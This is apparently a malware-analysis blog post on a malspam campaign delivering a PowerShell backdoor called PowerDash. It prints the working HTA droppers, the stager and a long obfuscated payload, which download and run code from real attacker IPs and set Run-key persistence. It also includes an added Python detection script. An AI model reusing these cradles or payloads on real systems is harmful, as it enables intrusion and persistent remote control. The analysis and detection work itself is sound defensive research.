
Malspam campaign delivering PowerDash – a tiny PowerShell backdoor

In late April we observed a malspam campaign delivering a previously unseen PowerShell malware. This post gives an overview of the campaign and of the malware's capabilities. We are dubbing the family "PowerDash" after the /dash path on the C2 server, which serves as the gateway for bots.

Execution graph

[Interactive diagram not reproduced. The chain it depicts:]
  Lure email, subject "Zapytanie o cene", drops the attachment Zapytanie_ofertowe_2023_011(XXXX).doc
  -> the document follows https://track.adform.net/adfserve/?bn=12345;redirurl=http://5.63.152.179/doc/zal_nr_1_zap_ofert(XXXX).doc
  -> the redirect target is fetched and executed using CVE-2017-0199
  -> HTA (VBScript -> PowerShell) launches the stager from http://5.63.152.179/pl/1txt/XXXX
  -> the stager downloads http://5.63.152.179/pl/2ht/XXXX to $env:computername.hta and adds it to Autostart, then downloads and executes PowerDash from http://5.63.152.179/pl/3txt/XXXX
  -> PowerDash registers the bot at https://95.163.240.184:8000/dash/post_data/ and waits for commands

Lure email message

The lure email is fairly short. It asks the recipient to provide price quotes for the inquiry attached to the email. A compromised email account was used to send out the messages.

The attachment is a MS Word document that exploits the CVE-2017-0199 vulnerability and fetches an additional HTA payload from a remote location.

$ strings ObjectPool/_1743066221/[3]LinkInfo
https://track.adform.net/adfserve/?bn=12345;redirurl=http://5.63.152.179/doc/zal_nr_1_zap_ofert(8164).doc

Judging by the non-unique tracking identifier (12345), the open redirect on the ad-tracking service was most likely used to get the payload URL past basic email security filters, not to track the reach of the campaign.

HTA payload

The HTA payload fetches and executes a PowerShell payload (the stager) from the same host. The one-liner reads the HTTP response byte by byte into a string and then resolves Invoke-Expression indirectly: `($ExecutionContext|GM)[6]` is the InvokeCommand property, the `*t*om*d` and `*Co*me` wildcards pick its GetCommand and GetCommandName methods, and `GetCommandName('*-Ex*n', ...)` yields the cmdlet name, so neither `Invoke-Expression` nor `iex` appears literally on the command line.

<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -1000, -1000
Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/1txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0
Window.Close
</script>

Stager

The stager is responsible for achieving persistence on the machine and downloading the final payload. The former is performed in a pretty standard manner: yet another HTA payload is downloaded to the temporary directory as %TEMP%\<COMPUTERNAME>.hta and a value named wsz_<id> is added to the HKCU Run key so that mshta.exe executes it at logon.

After that is done, the stager downloads the final payload and runs it with `[ScriptBlock]::Create` and the dot-source operator.

$Pth = "$env:temp\$env:computername.hta";
(New-Object System.Net.WebClient).DownloadFile('http://5.63.152.179/pl/2ht/8164',$Pth);
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "wsz_8164" /t REG_SZ /F /D "$Env:SystemRoot\System32\mshta.exe $Pth";
SI Variable:\bNW ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());
SV DLR '';
Try{While(1){(Get-ChildItem Variable:DLR).Value+=[Char](Get-Item Variable:/bNW).Value.ReadByte()}}Catch{};
.([ScriptBlock]::Create((Get-ChildItem Variable:DLR).Value))

Persistence HTA

The persistence script is functionally almost identical to the first HTA payload (this one is written in JScript rather than VBScript); the only difference is that it fetches the final payload from /pl/3txt/ instead of the stager from /pl/1txt/.

<script>
resizeTo (0,0);
moveTo (-1240, -1240);
r = new ActiveXObject("WScript.Shell").Run("powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0,true);
window.close();
</script>
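The HTA one-liners and the stager above leave a small set of observable behaviours: mshta.exe spawning PowerShell, a download primitive combined with an execution indirection on the PowerShell command line, and a Run value that launches mshta.exe on an .hta file in a Temp directory (named wsz_<digits> in this campaign). The following Python is an added example, not code from the report or from the malware: it encodes those behaviours as hunting rules and runs them over constructed Sysmon-style events (ID 1 process creation, ID 13 registry value set). Host, user and SID values are made up.

```python
"""Hunting rules for the PowerDash delivery chain, run over Sysmon-style events.

Event ID 1 = process creation, Event ID 13 = registry value set. EVENTS is
constructed sample telemetry: the malicious records mirror the HTA one-liner and
the stager from the report, the benign ones are everyday noise the rules must
not flag. Host, user and SID values are placeholders.
"""
import re
from pathlib import PureWindowsPath

# Command line from the HTA, truncated after the $ExecutionContext indirection.
POWERSHELL_CRADLE = (
    r"powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/1txt/8164')"
    r".GetResponse().GetResponseStream());Set-Variable Abg '';"
    r"Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};"
    r"&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(...)"
)

EVENTS = [
    {   # mshta.exe (launched by the CVE-2017-0199 document) starts the stager
        "id": 1,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\mshta.exe",
        "command_line": POWERSHELL_CRADLE,
    },
    {   # the stager registers the persistence HTA under the user's Run key
        "id": 13,
        "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wsz_8164",
        "details": r"C:\Windows\System32\mshta.exe C:\Users\jan\AppData\Local\Temp\DESKTOP-Q1W2E3.hta",
    },
    {   # benign: an administrator runs a script from a console
        "id": 1,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"powershell -NoProfile -File C:\ops\inventory.ps1",
    },
    {   # benign: an ordinary Run key entry
        "id": 13,
        "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "details": r"C:\Users\jan\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    },
]

# A download primitive alone is common; combined with an execution indirection it is a cradle.
DOWNLOAD = re.compile(
    r"\[Net\.HttpWebRequest\]::Create\(|Net\.WebClient|Download(?:File|String)\(", re.I)
EXECUTE = re.compile(
    r"\$ExecutionContext|\|\s*GM\)\[|Invoke-Expression|\biex\b|\[ScriptBlock\]::Create\(", re.I)
RUN_VALUE = re.compile(r"\\CurrentVersion\\Run\\([^\\]+)$", re.I)   # captures the value name
TEMP_HTA = re.compile(r"\\Temp\\\S+\.hta\b", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def check_process(ev):
    hits = []
    if basename(ev["image"]) in ("powershell.exe", "pwsh.exe"):
        if basename(ev["parent_image"]) == "mshta.exe":
            hits.append("mshta.exe spawned PowerShell")
        if DOWNLOAD.search(ev["command_line"]) and EXECUTE.search(ev["command_line"]):
            hits.append("PowerShell download-and-execute cradle")
    return hits


def check_registry(ev):
    hits = []
    m = RUN_VALUE.search(ev["target_object"])
    if m and "mshta.exe" in ev["details"].lower() and TEMP_HTA.search(ev["details"]):
        hits.append("Run value launches mshta.exe on an .hta in a Temp directory")
        if re.fullmatch(r"wsz_\d+", m.group(1)):     # campaign-specific name from the report
            hits.append("Run value name matches PowerDash pattern wsz_<digits>")
    return hits


def detect(events):
    """Return (event_index, finding) pairs for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        hits = check_process(ev) if ev["id"] == 1 else check_registry(ev) if ev["id"] == 13 else []
        findings.extend((i, hit) for hit in hits)
    return findings


if __name__ == "__main__":
    for i, hit in detect(EVENTS):
        print(f"event {i}: {hit}")
```

The two process rules are kept separate on purpose: the parent/child pair catches the initial execution even if the command line is rewritten, while the cradle rule catches the same technique when it is launched from a different parent, such as the persistence HTA at logon.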

The payload – PowerDash

The final payload is heavily obfuscated with what amounts to a PowerShell version of JSFuck.

('______'  |  %{  ${~}=+$()  }  {${``%}  =  ${~}  }  {  ${~*(}  =++  ${~}  }{  ${[*}  =  (  ${~}=  ${~}+  ${~*(}  )  }  {${[)$}  =(${~}=  ${~}+  ${~*(})  }{${``}=(  ${~}=${~}  +  ${~*(}  )}  {  ${;!@}=(  ${~}=${~}+  ${~*(}  )  }  {${#)``}  =(${~}=  ${~}  +${~*(}  )  }{${'}=(${~}  =  ${~}+${~*(})  }  {${.#=}  =(  ${~}  =${~}+${~*(})}  {  ${#+}=  (  ${~}=  ${~}  +  ${~*(}  )  }{${@}  ="["+  "$(@{}  )"[${'}  ]+  "$(@{  })"[  "${~*(}"  +  "${#+}"]+  "$(  @{}  )"[  "${[*}"  +  "${``%}"]+  "$?  "[${~*(}]  +  "]"}{${~}="".("$(@{  }  )  "["${~*(}"  +  "${``}"  ]  +"$(@{  }  )  "["${~*(}"  +"${#)``}"  ]+  "$(@{})"[${``%}]+"$(@{})  "[  ${``}  ]  +"$?"[${~*(}]+  "$(@{})  "[${[)$}]  )}{  ${~}=  "$(@{  })"["${~*(}${``}"]  +  "$(@{  })"[  ${``}  ]  +"${~}"["${[*}${'}"  ]  }  );  .  ${~}("${~}  (  ${@}${#+}${~*(}+${@}${'}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${``}${#)``}+  ${@}${.#=}${[)$}  +  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${;!@}  +${@}${#+}${#+}  +  ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}+${@}${'}${'}  +  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``%}+  ${@}${#+}${'}+${@}${~*(}${``%}${[)$}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}+  ${@}${#+}${[)$}  +${@}${;!@}${.#=}+${@}${;!@}${.#=}+  ${@}${.#=}${[)$}+  ${@}${~*(}${``%}${~*(}+${@}${#+}${#+}  +${@}${~*(}${~*(}${'}  +${@}${~*(}${~*(}${``}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(}  +  ${@}${.#=}${``%}  +${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${~*(}${~*(}+  ${@}${#+}${#+}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${.#=}+${@}${[)$}${[*}  +${@}${#)``}${~*(}  +${@}${[)$}${[*}+  ${@}${#+}${~*(}  +${@}${'}${.#=}  +${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${#)``}  +  ${@}${``}${#)``}+  ${@}${.#=}${[)$}+  ${@}${~*(}${``%}${~*(}  +${@}${#+}${#+}+${@}${~*(}${~*(}${'}+  
${@}${~*(}${~*(}${``}  +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${#)``}  +${@}${~*(}${[*}${~*(}+${@}${.#=}${``%}  +${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${~*(}+${@}${#+}${#+}  +  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${.#=}+${@}${.#=}${``}  +  ${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${[*}+${@}${~*(}${``%}${~*(}  +  ${@}${#+}${[)$}  +${@}${;!@}${.#=}+  ${@}${;!@}${.#=}+${@}${.#=}${``}+${@}${~*(}${``%}${.#=}  +  ${@}${~*(}${~*(}${;!@}  +${@}${``}${#+}  +${@}${;!@}${``%}  +  ${@}${~*(}${[)$}  +${@}${~*(}${``%}  +${@}${#+}${~*(}  +${@}${.#=}${[)$}  +${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${``%}${#+}  +${@}${``}${#)``}+  ${@}${'}${.#=}  +  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${#)``}+${@}${``}${#)``}  +  ${@}${.#=}${[)$}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${;!@}  +${@}${#+}${#+}+  ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%}  +  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``}+  ${@}${'}${'}+  ${@}${#+}${'}  +${@}${~*(}${~*(}${``%}+${@}${#+}${'}  +${@}${~*(}${``%}${[)$}+  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +  ${@}${#+}${[)$}+  ${@}${;!@}${.#=}  +${@}${;!@}${.#=}  +  ${@}${.#=}${[)$}  +${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${``}  +  ${@}${#)``}${'}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${``%}${[*}+  ${@}${~*(}${``%}${;!@}+${@}${#+}${#+}+${@}${#+}${'}+  ${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${~*(}  +${@}${.#=}${#)``}  +${@}${#+}${'}  +  ${@}${~*(}${``%}${.#=}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${``%}${``%}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${``%}  +${@}${#)``}${'}+  ${@}${#+}${'}  +  
${@}${~*(}${``%}${.#=}+  ${@}${~*(}${``%}${.#=}+  ${@}${#+}${.#=}  +${@}${#+}${'}  +${@}${#+}${#+}+${@}${~*(}${``%}${'}  +  ${@}${[)$}${[*}+  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +  ${@}${~*(}${[*}${[)$}+  ${@}${[)$}${#)``}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${'}  +  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${[*}${;!@}+${@}${~*(}${[)$}  +${@}${~*(}${``%}+${@}${[)$}${#)``}+${@}${~*(}${~*(}${'}  +  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${``%}${.#=}  +${@}${[)$}${[*}+  ${@}${[)$}${[*}+${@}${#)``}${~*(}+${@}${[)$}${[*}  +  ${@}${[)$}${``}+${@}${~*(}${``%}${``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${;!@}+  ${@}${;!@}${.#=}  +${@}${``}${'}  +  ${@}${``}${'}  +  ${@}${;!@}${'}  +${@}${;!@}${[)$}  +  ${@}${``}${#)``}  +  ${@}${``}${#+}  +  ${@}${;!@}${``}+${@}${;!@}${~*(}  +  ${@}${``}${#)``}+  ${@}${;!@}${``%}  +${@}${;!@}${[*}  +${@}${``}${.#=}+${@}${``}${#)``}  +${@}${``}${#+}+${@}${;!@}${#)``}  +${@}${;!@}${[*}  +${@}${;!@}${.#=}  +${@}${;!@}${#)``}  +${@}${``}${.#=}  +${@}${``}${.#=}+${@}${``}${.#=}+${@}${``}${'}  +  ${@}${~*(}${``%}${``%}+${@}${#+}${'}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${``%}${``}  +  ${@}${``}${'}  +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}+${@}${#+}${;!@}+${@}${~*(}${``%}${``%}+${@}${#+}${'}+  ${@}${~*(}${~*(}${#)``}+  ${@}${#+}${'}  +  ${@}${``}${'}+  ${@}${[)$}${``}+${@}${~*(}${[)$}  +  ${@}${~*(}${``%}  +  ${@}${[)$}${#)``}+${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(}  +  ${@}${[)$}${[*}  +${@}${#)``}${~*(}+${@}${[)$}${[*}  +  ${@}${#)``}${``}  +  ${@}${~*(}${[*}${[)$}+  ${@}${~*(}${[)$}+${@}${~*(}${``%}+${@}${[)$}${[*}+  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}+  ${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${'}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%}  +${@}${[)$}${[*}+${@}${#)``}${~*(}  +  ${@}${[)$}${[*}+  ${@}${``}${``%}  +  ${@}${'}${~*(}+  
${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +  ${@}${``}${;!@}+  ${@}${.#=}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${;!@}+${@}${'}${#+}+  ${@}${#+}${.#=}+  ${@}${~*(}${``%}${#)``}  +${@}${~*(}${``%}${~*(}+${@}${#+}${#+}  +${@}${~*(}${~*(}${#)``}  +  ${@}${[)$}${[*}  +  ${@}${.#=}${'}  +  ${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${``%}  +  ${@}${;!@}${~*(}  +  ${@}${;!@}${``%}+${@}${#+}${;!@}+${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}+${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(}  +${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${``%}${#+}  +${@}${.#=}${``%}  +  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+}+  ${@}${~*(}${~*(}${#)``}+${@}${``}${~*(}  +${@}${``}${#)``}+${@}${.#=}${;!@}  +${@}${.#=}${;!@}+  ${@}${'}${[)$}  +  ${@}${#)``}${.#=}  +${@}${~*(}${[)$}  +${@}${~*(}${``%}  +  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +${@}${[)$}${[*}  +${@}${[)$}${[*}+  ${@}${~*(}${~*(}${``%}+  ${@}${#+}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}+  ${@}${[)$}${#)``}  +${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${.#=}+  ${@}${;!@}${.#=}  +${@}${#)``}${'}  +  ${@}${'}${#+}  +  ${@}${'}${'}  +${@}${.#=}${``%}  +${@}${.#=}${;!@}  +  ${@}${.#=}${``}  +  ${@}${#)``}${#+}+  ${@}${.#=}${[*}  +${@}${'}${.#=}  +${@}${#)``}${;!@}  +${@}${'}${'}+${@}${#)``}${#+}+  ${@}${~*(}${[)$}  +  ${@}${~*(}${``%}  +  ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*}  +${@}${[)$}${[*}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+  ${@}${[)$}${[*}+${@}${[)$}${[*}  +  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${#)``}+${@}${``}${;!@}  +  ${@}${.#=}${'}+${@}${~*(}${``%}${#+}+  
${@}${~*(}${``%}${;!@}+  ${@}${'}${#+}+  ${@}${#+}${.#=}  +${@}${~*(}${``%}${#)``}  +${@}${~*(}${``%}${~*(}+  ${@}${#+}${#+}+  ${@}${~*(}${~*(}${#)``}+  ${@}${[)$}${[*}  +  ${@}${``}${;!@}+  ${@}${#)``}${'}  +${@}${~*(}${``%}${.#=}  +${@}${#+}${'}+  ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}  +${@}${.#=}${'}  +${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${``%}+  ${@}${;!@}${~*(}  +${@}${;!@}${``%}  +${@}${#+}${;!@}  +  ${@}${'}${#+}  +${@}${~*(}${~*(}${[*}  +${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}+  ${@}${#+}${'}  +${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${``%}${[)$}  +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${``%}${#+}  +  ${@}${``}${~*(}+  ${@}${``}${#)``}  +  ${@}${#)``}${'}  +${@}${#+}${'}+  ${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}  +${@}${~*(}${[)$}+  ${@}${~*(}${``%}+  ${@}${[)$}${[*}+${@}${[)$}${[*}+  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +${@}${~*(}${``%}${.#=}  +  ${@}${#+}${'}  +${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${``%}${[)$}  +  ${@}${[)$}${[*}+  ${@}${#)``}${~*(}+${@}${[)$}${[*}+  ${@}${``}${``%}  +  ${@}${'}${~*(}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${``}${;!@}+  ${@}${#)``}${'}  +  ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+}  +${@}${'}${[)$}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${~*(}${#)``}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${#+}${#+}  +${@}${~*(}${``%}${~*(}  +  ${@}${[)$}${[*}+  ${@}${#)``}${'}  +  ${@}${'}${[)$}  +  ${@}${'}${'}  +  ${@}${#+}${;!@}  +  ${@}${.#=}${#)``}  +${@}${~*(}${``%}${;!@}+  ${@}${~*(}${``%}${``%}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${~*(}+${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${.#=}  
+${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}  +  ${@}${~*(}${[*}${``}  +${@}${[)$}${'}  +  ${@}${~*(}${[*}${[)$}  +${@}${#+}${~*(}+  ${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${~*(}${#)``}+  ${@}${#+}${[)$}  +${@}${#+}${~*(}+  ${@}${~*(}${``%}${#+}+  ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${``}  +${@}${#+}${[)$}+  ${@}${;!@}${.#=}  +  ${@}${;!@}${.#=}+${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${'}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${``%}${``%}+  ${@}${``}${``%}  +${@}${[)$}${#)``}  +  ${@}${#+}${;!@}+  ${@}${``}${#)``}  +${@}${#)``}${;!@}  +  ${@}${~*(}${``%}${``%}+  ${@}${#+}${'}+${@}${~*(}${~*(}${[*}  +${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}+  ${@}${.#=}${[*}+${@}${#)``}${;!@}+  ${@}${'}${'}+${@}${``}${'}+${@}${``}${#+}  +  ${@}${'}${~*(}+  ${@}${#)``}${#)``}+  ${@}${``}${~*(}  +  ${@}${~*(}${[*}${;!@}  +  ${@}${``}${~*(}+${@}${[)$}${[*}  +  ${@}${``}${;!@}+  ${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${``%}+  ${@}${``}${``%}  +${@}${[)$}${``}  +${@}${;!@}${#+}  +${@}${[)$}${[*}  +  ${@}${[)$}${``}  +  ${@}${``}${~*(}+${@}${~*(}${[)$}  +  ${@}${~*(}${``%}+  ${@}${[)$}${[*}+  ${@}${[)$}${[*}+  ${@}${[)$}${[*}+  ${@}${[)$}${[*}+  ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}  +${@}${#+}${'}+${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${``%}+  ${@}${[)$}${[*}  +  ${@}${#)``}${~*(}  +${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(}  +  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${#)``}  +  ${@}${``}${;!@}  +  ${@}${.#=}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${;!@}+  ${@}${'}${#+}+${@}${#+}${.#=}  +${@}${~*(}${``%}${#)``}+  ${@}${~*(}${``%}${~*(}  +  ${@}${#+}${#+}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${[)$}${[*}+${@}${``}${;!@}  +${@}${#)``}${'}+${@}${~*(}${``%}${.#=}+  ${@}${#+}${'}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+  
${@}${.#=}${'}+${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${``%}+  ${@}${;!@}${~*(}  +${@}${;!@}${``%}  +${@}${#+}${;!@}  +  ${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${~*(}${[*}  +${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${``}  +  ${@}${.#=}${[)$}+  ${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${``%}${#+}+${@}${``}${~*(}  +  ${@}${``}${#)``}  +${@}${#)``}${.#=}+  ${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}+  ${@}${#+}${'}  +${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``%}+${@}${~*(}${[)$}  +${@}${~*(}${``%}  +  ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*}  +  ${@}${[)$}${[*}+${@}${#+}${'}  +${@}${~*(}${~*(}${.#=}  +${@}${[)$}${[*}+${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +${@}${``}${``%}  +  ${@}${'}${~*(}+  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}  +${@}${.#=}${'}+  ${@}${~*(}${``%}${#+}+  ${@}${~*(}${``%}${;!@}+${@}${'}${#+}  +${@}${#+}${.#=}  +  ${@}${~*(}${``%}${#)``}+  ${@}${~*(}${``%}${~*(}  +${@}${#+}${#+}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${[)$}${[*}+${@}${``}${;!@}+  ${@}${~*(}${~*(}${``%}+${@}${#+}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${[*}  +  ${@}${#+}${'}  +  ${@}${#+}${#+}  +${@}${~*(}${``%}${~*(}  +  ${@}${[)$}${[*}+${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${~*(}${~*(}  